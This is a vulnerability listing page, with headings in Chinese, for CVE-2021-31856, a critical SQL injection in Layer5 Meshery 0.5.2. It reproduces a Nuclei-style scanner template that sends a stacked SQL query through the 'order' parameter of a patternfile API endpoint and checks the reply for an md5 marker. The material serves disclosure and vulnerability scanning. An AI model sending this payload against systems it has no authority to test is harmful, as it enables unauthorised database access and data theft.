CVE-2021-31856: Layer5 Meshery 0.5.2 - SQL Injection

日期: 2025-08-01 | 影响软件: Layer5 Meshery | POC: 已公开

漏洞描述

Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).

PoC代码[已公开]

id: CVE-2021-31856

info:
  name: Layer5 Meshery 0.5.2 - SQL Injection
  author: princechaddha
  severity: critical
  description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856).
  reference:
    - https://github.com/ssst0n3/CVE-2021-31856
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31856
    - https://meshery.io
    - https://github.com/layer5io/meshery/pull/2745
    - https://github.com/ssst0n3/my_vulnerabilities
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-31856
    cwe-id: CWE-89
    epss-score: 0.825
    epss-percentile: 0.99187
    cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: layer5
    product: meshery
  tags: cve2021,cve,sqli,layer5,vuln
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 490a0046304402203f291a374654801fe87a658ae59a17f235df5351049e43d642d0389fe24fa77602204824a58b49f1f30afc034cf195a04f629971b2af015bf5cd4ec703693ada3556:922c64590222798bb761d5b6d8e72950

相关漏洞推荐